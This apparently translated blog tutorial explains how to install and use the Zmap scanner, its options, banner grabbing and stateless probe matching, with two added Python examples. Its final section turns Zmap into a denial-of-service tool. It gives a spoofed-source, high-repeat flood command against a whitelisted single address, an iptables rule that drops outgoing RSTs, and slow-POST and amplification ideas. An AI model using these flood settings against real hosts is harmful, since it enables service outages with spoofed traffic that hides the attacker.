Livers, 2013/08/23
0x00 Background
Zmap is a scanner developed by researchers at the University of Michigan. It drew attention at the 22nd USENIX Security Symposium with a scan rate roughly 1300 times that of Nmap, and raw speed is its biggest selling point compared with the well-known Nmap: on a gigabit NIC it can scan one port across the entire IPv4 address space in about 45 minutes.
Installation:
64-bit version
Debian/Ubuntu:
Step 1: sudo apt-get install libgmp3-dev libpcap-dev gengetopt
Step 2: wget https://github.com/zmap/zmap/archive/v1.0.3.tar.gz
Step 3: tar zxvf v1.0.3.tar.gz
Step 4: cd zmap-1.0.3/src
Step 5: make && make install
32-bit version (the Zmap home page only claims support for 64-bit Linux; it also built and ran on 32-bit BT5 R3 here, but the 64-bit build is recommended)
Debian/Ubuntu:
Step 1: sudo apt-get install libgmp3-dev libpcap-dev gengetopt
Step 2: git clone git://github.com/zmap/zmap.git
Step 3: tar -zxvf v1.0.2.tar.gz
Step 4: cd zmap-1.0.2/src
Step 5: make && make install
Fedora, Red Hat Enterprise Linux, or CentOS
Replace Step 1 (the package install) with:
sudo yum install gmp gmp-devel libpcap-devel gengetopt
To use Redis for result storage, install hiredis first and pass the Redis build option in Step 5:
make REDIS=true
If Zmap will be run by a non-root user, give the binary the raw-socket capability it needs to send crafted packets:
setcap cap_net_raw=ep /usr/local/sbin/zmap
0x01 Basic Usage
Once installed, Zmap can be called directly.
1. The simplest call
zmap -B 10M -p 80 -n 100000 -o results.txt
-B is the send bandwidth, -p the target port, -n the number of targets to scan and -o the output file.
The whole line means: scan port 80 on 100000 addresses using 10 Mbit/s of bandwidth and write the responding addresses to results.txt.
On BT5 R3 I had to add the -G option as well:
zmap -B 10M -p 80 -n 100000 -G "01:00:5e:00:00:02" -o results.txt
-G sets the destination MAC address of the outgoing frames. It must be the real MAC address of the gateway; otherwise the probes are never forwarded and nothing comes back.
When port 80 is scanned, the responding addresses are saved one per line:
115.237.116.119
23.9.117.80
207.118.204.141
217.120.143.111
2. The most used command
zmap -p 443 -G "00:00:00:00:00:00"
Several of the Zmap research projects are concerned with measuring SSL/TLS deployment across the Internet.
My full-Internet scan took about 9 hours 16 minutes. The link is 10M ADSL whose uplink is only about 100K, which roughly doubles the time.
3. Common parameters

-p, --target-port=port
Destination port to scan.

-o, --output-file=name
Write the results to the given file, e.g. -o result.txt.

-b, --blacklist-file=path
Addresses or ranges that must never be scanned, one per line; 192.168.0.0/16, for instance, excludes all of 192.168.x.x. A default list covering RFC 1918 private ranges and other reserved space ships in conf/blacklist.conf:
zmap -p 443 -G "00:00:00:00:00:00" -b conf/blacklist.conf

-n, --max-targets=n
Maximum number of addresses to probe. -n 100 scans 100 addresses; a percentage such as -n 0.1% scans 0.1% of the address space left after the blacklist is applied.

-N, --max-results=n
Maximum number of results. -N 100 stops the scan once 100 responses have been recorded.

-t, --max-runtime=secs
Maximum run time. -t 10 ends the scan after 10 seconds.

-r, --rate=pps
Packets sent per second. -r 10000 sends 10k packets per second.

-B, --bandwidth=bps
Send bandwidth, an alternative way of setting the rate. -B 10M means 10 Mbit/s; the suffixes G, M and K are accepted.

-c, --cooldown-time=secs
How long to keep receiving after the last probe has been sent. Default 8 s. Responses arrive asynchronously, so late replies are only caught within this window.

-e, --seed=n
Seed for the pseudo-random permutation of the address space (a C PRNG seed). Using the same seed reproduces the same scan order.

-T, --sender-threads=n
Number of sending threads, default 1. In testing, a single thread already saturates the link.

-P, --probes=n
Number of probes sent to each address, default 1. (One of the parameters that matters for DDoS.)

-d, --dryrun
Print each packet instead of sending it; very useful for checking a scan before running it.

-s, --source-port=port|range
Source port or port range, e.g. -s 30000-50000. (One of the parameters that matters for DDoS.)

-S, --source-ip=ip|range
Source address or address range, e.g. -S 100.100.0.1-200.200.200.200. (One of the parameters that matters for DDoS.)

-G, --gateway-mac=addr
Gateway MAC address. The option accepts any value, but the probes only leave the network when it matches the real gateway. (One of the parameters that matters for DDoS.)

-M, --probe-module=name
tcp_synscan (default), icmp_echoscan (ping scan) or udp (measured slower than the other two). Custom modules can be written. In 1.0.2 the UDP payload is a string hard-coded in the module source (`*udp_send_msg = "GET / HTTP/1.1\r\n"; // Must be null-terminated`), so changing it means editing the source; the author has said a user-defined UDP payload option will follow.

-O, --output-module=name
Output module: simple_file (default) or extended_file.
simple_file output looks like this:
115.237.116.119
23.9.117.80
207.118.204.141
217.120.143.111
extended_file output looks like this (a CSV header, then one record per response):
response, saddr, daddr, sport, dport, seq, ack, in_cooldown, is_repeat, timestamp
synack, 159.174.153.144, 10.0.0.9, 80, 40555, 3050964427, 3515084203, 0, 0, 2013-08-15 18:55:47.681
Both the probe modules and the output modules expose an API, so functionality can be added as needed.

--quiet
Run quietly, without printing progress to the screen.

--summary
Print a summary at the end; very helpful for research use.
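To make use of extended_file records, here is an added example (not from the original post and not part of Zmap) that parses that CSV layout with Python's csv module, skips is_repeat duplicates, and separates hosts that answered SYN+ACK (port open) from hosts that only answered RST (port closed). The rows in SAMPLE are constructed to match the header shown above; the function names are the example's own.

```python
"""Parse Zmap 1.x extended_file output into a per-host summary.

Added example, not part of the original post or of Zmap itself. The record
layout follows the header printed above; the rows in SAMPLE are constructed.
"""
import csv
import io
from collections import Counter

# Constructed sample in the extended_file layout (header + records).
SAMPLE = """\
response, saddr, daddr, sport, dport, seq, ack, in_cooldown, is_repeat, timestamp
synack, 159.174.153.144, 10.0.0.9, 80, 40555, 3050964427, 3515084203, 0, 0, 2013-08-15 18:55:47.681
rst, 203.0.113.7, 10.0.0.9, 80, 40556, 0, 3515084204, 0, 0, 2013-08-15 18:55:47.702
synack, 159.174.153.144, 10.0.0.9, 80, 40555, 3050964427, 3515084203, 0, 1, 2013-08-15 18:55:48.010
synack, 198.51.100.23, 10.0.0.9, 80, 40557, 1122334455, 3515084205, 1, 0, 2013-08-15 18:55:59.120
"""

INT_FIELDS = ("sport", "dport", "seq", "ack", "in_cooldown", "is_repeat")


def parse_extended(text):
    """Yield one dict per record with whitespace stripped and counters as ints."""
    reader = csv.DictReader(io.StringIO(text), skipinitialspace=True)
    for row in reader:
        rec = {k.strip(): v.strip() for k, v in row.items()}
        for field in INT_FIELDS:
            rec[field] = int(rec[field])
        yield rec


def summarize(text):
    """Return (open_hosts, closed_hosts, counts).

    open_hosts:   sorted unique responders that sent SYN+ACK (port open)
    closed_hosts: sorted unique responders that only ever sent RST (port closed)
    counts:       responses by type, with is_repeat records skipped so a host
                  that retransmits its SYN+ACK is counted once
    in_cooldown only marks that the reply arrived after sending finished; such
    records are still valid and are kept.
    """
    open_hosts, rst_hosts, counts = set(), set(), Counter()
    for rec in parse_extended(text):
        if rec["is_repeat"]:
            continue
        counts[rec["response"]] += 1
        if rec["response"] == "synack":
            open_hosts.add(rec["saddr"])
        elif rec["response"] == "rst":
            rst_hosts.add(rec["saddr"])
    return sorted(open_hosts), sorted(rst_hosts - open_hosts), counts


if __name__ == "__main__":
    import sys
    text = SAMPLE if sys.stdin.isatty() else sys.stdin.read()
    opened, closed, counts = summarize(text)
    print("open ports on:", ", ".join(opened))
    print("closed (RST) on:", ", ".join(closed))
    print("responses:", dict(counts))
```

Feed it a real file with `zmap -p 80 -O extended_file -o - | python3 parse_extended.py`; the sample is only used when stdin is a terminal.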
0x02 Three Extension Applications
Banner Grab
Grabs a banner, i.e. the first response a service returns, as material for identifying it (an SSH version string, an HTTP 401, and so on).
The code lives in the examples/banner-grab directory.
First run make, which produces banner-grab-tcp.
Then write the data to send into a file, here http-req (an ssh-req or similar can be made the same way), for example:
echo -e -n "GET / HTTP/1.1\r\nHost: %s\r\n\r\n" > http-req
(%s is reserved for the target address; the rest of the request is free-form, GET or POST.)
banner-grab-tcp takes these options:
-c, --concurrent  Number of simultaneous connections, preferably below 1000. The per-process open-file limit defaults to 1024; raise it with ulimit -Sn 1000000 and ulimit -Hn 1000000 before going higher.
-p, --port  Port to connect to
-t, --conn-timeout  Connection timeout
-r, --read-timeout  Response read timeout
-v, --verbosity  Verbosity level, similar to sqlmap
-f, --format  Output format: hex, ascii or base64
-d, --data  File holding the data to send, i.e. the http-req written above
The banner length is capped in the source by #define MAX_BANNER_LEN 1024.
Used together with Zmap:
zmap -p 80 -N 1000 -o - | ./banner-grab-tcp -p 80 -c 100 -d http-req > http-banners.out
Zmap finds 1000 addresses with port 80 open and banner-grab-tcp connects to each of them, sending the request set in http-req.
forge-socket
Works like banner-grab and takes similar options, so they are not repeated here.
The main difference is the installation: a kernel module has to be built and loaded first:
git clone git@github.com:ewust/forge_socket.git
cd forge_socket
make
sudo insmod forge_socket.ko
and iptables must be used to keep the kernel from sending RST packets for the half-open connections:
iptables -A OUTPUT -p tcp -m tcp --tcp-flags RST,RST RST,RST -j DROP
UDP Data Probes
Added in version 1.0.3.
For the test payloads, see the probe files under
github.com/zmap/zmap/t…
Taking MSSQL on UDP port 1434 as an example:
zmap -M udp -p 1434 --probe-args=file:examples/udp-probes/mssql_1434.pkt
The .pkt files can also be written by hand.
Configuration file
A configuration file keeps the command line short:
interface "eth1"
source-ip 1.1.1.4-1.1.1.8
gateway-mac b4:23:f9:28:fa:2d   # upstream gateway
cooldown-time 300               # seconds
blacklist-file /etc/zmap/blacklist.conf
output-file ~/zmap-output
quiet
summary
Every setting above corresponds to an option described earlier.
Usage:
zmap --config=~/.zmap.conf --target-port=443
0x03 How It Works
Start from the TCP three-way handshake.
In TCP/IP, TCP provides a reliable connection service and uses the three-way handshake to set a connection up.
The handshake is a send, wait, respond cycle, and the waiting is what makes a connect-style scan slow.
Zmap only ever sends the SYN and never completes the handshake. The scanning host's kernel has no socket for the connection, so when a SYN+ACK arrives the kernel answers with an RST and the half-open connection is torn down while Zmap is already sending the next probe. Zmap also keeps no per-target state. Instead of a table of outstanding probes, it derives each SYN's sequence number and source port from a keyed function of the target address (validate_gen in the source); when a SYN+ACK or RST comes back, it recomputes that value from the responder's address and checks the acknowledgement number and destination port against it, which is enough to tell a genuine reply from stray traffic. Sending without waiting and matching without a lookup table are the basic reasons for its speed.
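The stateless matching described above, as an added example that is not Zmap's code: the SYN's sequence number and source port are derived from a keyed function of the target address (Zmap's validate_gen uses AES; HMAC-SHA256 stands in here), and a reply is accepted only if its destination port and acknowledgement number match a recomputation. The packets are plain dicts standing in for the IP/TCP header fields a pcap callback would expose, and reply_for models the target's behaviour; all of it is constructed.

```python
"""Stateless probe/response matching, reduced to the idea Zmap uses.

Added example, not Zmap's code. Zmap derives the TCP sequence number and
source port of every SYN from a keyed function of the target address (its
validate_gen uses AES; HMAC-SHA256 stands in here), so a reply can be checked
by recomputation instead of a per-target table. Packets are plain dicts that
stand in for IP/TCP header fields; they are constructed, not captured.
"""
import hashlib
import hmac
import os
import struct

SOURCE_PORTS = range(32768, 61000)   # the -s range; -S would vary the source IP too
KEY = os.urandom(16)                  # fresh per scan, like Zmap's per-run validation key


def validation(src_ip, dst_ip, key=KEY):
    """Keyed tag for a (scanner, target) pair: the SYN's seq and source port."""
    tag = hmac.new(key, f"{src_ip}>{dst_ip}".encode(), hashlib.sha256).digest()
    seq, idx = struct.unpack(">II", tag[:8])
    return seq, SOURCE_PORTS[idx % len(SOURCE_PORTS)]


def make_syn(src_ip, dst_ip, dst_port, key=KEY):
    """Probe for one target; nothing about it needs to be remembered afterwards."""
    seq, sport = validation(src_ip, dst_ip, key)
    return {"saddr": src_ip, "daddr": dst_ip, "sport": sport, "dport": dst_port,
            "seq": seq, "ack": 0, "flags": "S"}


def classify_reply(pkt, our_ip, dst_port, key=KEY):
    """Return 'synack' (port open), 'rst' (port closed) or None (not a reply to
    one of our probes). A reply must come from the scanned port, be addressed to
    the source port derived for that responder, and acknowledge seq+1."""
    if pkt["daddr"] != our_ip or pkt["sport"] != dst_port:
        return None
    seq, sport = validation(our_ip, pkt["saddr"], key)
    if pkt["dport"] != sport or pkt["ack"] != (seq + 1) & 0xFFFFFFFF:
        return None
    if pkt["flags"] == "SA":
        return "synack"
    if "R" in pkt["flags"]:
        return "rst"
    return None


def reply_for(syn, port_open):
    """Constructed target behaviour: SYN+ACK for an open port, RST+ACK for a closed one."""
    return {"saddr": syn["daddr"], "daddr": syn["saddr"], "sport": syn["dport"],
            "dport": syn["sport"], "seq": 0x1234, "ack": (syn["seq"] + 1) & 0xFFFFFFFF,
            "flags": "SA" if port_open else "RA"}


if __name__ == "__main__":
    syn = make_syn("10.0.0.9", "203.0.113.7", 80)
    print("probe:", syn)
    print("open   ->", classify_reply(reply_for(syn, True), "10.0.0.9", 80))
    print("closed ->", classify_reply(reply_for(syn, False), "10.0.0.9", 80))
    stray = dict(reply_for(syn, True), ack=42)
    print("stray  ->", classify_reply(stray, "10.0.0.9", 80))
```

Because the check is a recomputation, memory use does not grow with the number of probes in flight, and a host that injects fake SYN+ACKs without knowing the key cannot pollute the results.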
0x04 Further Thoughts
Usability for DDoS:
The author's aim is scanning the whole Internet, and nothing about DDoS is mentioned.
There are no specific instructions for sending packets at a single point either.
The discussion below may run contrary to the author's intent; please keep it to technical research, not malicious sabotage.
Targeting an address range or a single address
-w, --whitelist-file=path
Restricts the scan to the addresses or ranges listed in the file, for example:
222.222.221.82/24 (a range like 192.168.1.0-255; the -e seed can be used to adjust which address the scan starts from)
Single IP address:
222.222.221.82/32 (a random address. In version 1.0.2 a /32 cannot be scanned directly; a small part of the root-node handling of the address tree in blacklist.c and constraint.c has to be changed.)
Then use:
-P 10000000 (repeated packets to each address)
-s 2000-60000 (a wide source-port range)
-S 20.20.20.0-200.200.200.200 (a large number of random source addresses)
zmap -p 80 -P 10000000 -s 2000-60000 -S 20.20.20.0-200.200.200.200 -w attackurl.txt
The packet capture showed the data being sent as expected.
What harm could this do?
IP spoofing, SYN floods, land attacks, ICMP floods, application-layer floods and UDP null-payload floods can all be configured.
Zmap sends packets without waiting for the RSTs the kernel sends afterwards.
The RSTs can also be suppressed cleanly with iptables:
iptables -A OUTPUT -p tcp -m tcp --tcp-flags RST,RST RST,RST -j DROP
which drops the RST packets before they leave.
Can we go further?
Some of the extensions reach the application layer, where slow attacks are possible too.
GET type
The http-req written above, echo -e -n "GET / HTTP/1.1\r\nHost: %s\r\n\r\n" > http-req, is replaced with a different request written the same way.
POST type
The Content-Length (sizeof(value)) can be set to a large dynamic value while the POST body actually sent is small.
DDoS is traffic volume plus connection count plus malformed packets.
Raw traffic volume can only be fought with hardware.
Zmap pushes a link close to its full bandwidth, so a server on a 10G port would not be far behind; combined with DNS amplification and the like, the numbers become frightening.
PS:
Zmap resembles Python's Scapy in some respects.
Being pure C, Zmap is far more efficient than Scapy.
I once had the same problem with Scapy sending RSTs afterwards; iptables is a good answer for that too.
With the source and the fairly clean API as reference, writing modules opens up a lot of tricks.
LINKS:
zmap.io/documentati…
github.com/zmap/